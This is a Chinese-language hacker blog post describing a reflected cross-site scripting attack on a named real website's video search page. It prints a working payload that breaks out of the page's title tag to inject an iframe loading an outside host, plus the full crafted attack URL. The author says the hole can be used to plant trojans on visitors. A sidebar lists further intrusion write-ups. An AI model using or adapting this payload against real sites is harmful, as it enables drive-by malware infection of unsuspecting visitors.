|
进入网站。。搜索处。。写入跨站代码。。提交后跨站效果虽然出来了。。但是。。
他给了我们http://vsearch.cctv.com/这个URL。。毫无利用价值。。于是看看源码。。看看有没有办法。。
<title><iframe src=http://hc8888.anyp.cn width=999 height=999></iframe>-CCTV视频搜索</title>
看。。。虽然下面也有我们的跨站代码。。。但是能够用这个<title>为什么不用呢?` 于是。。再次写入跨站代码
</title><iframe src=http://hc8888.anyp.cn width=999 height=999></iframe><title>
使<title>语句提前结束。。。提交之后。。这次显示了跨站后的URL.
http://vsearch.cctv.com/tvsearch.jsp?q=%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fhc8888.anyp.cn+width%3D999+height%3D999%3E%3C%2Fiframe%3E%3Ctitle%3E&dq=%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fhc8888.anyp.cn+width%3D999+height%3D999%3E%3C%2Fiframe%3E%3Ctitle%3E&md=&d=v&vd=&db=forcctv&s=d&lang=&sn=1&t=
.爽。。。这样我们就能够利用他挂马了。。。嘎嘎```
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |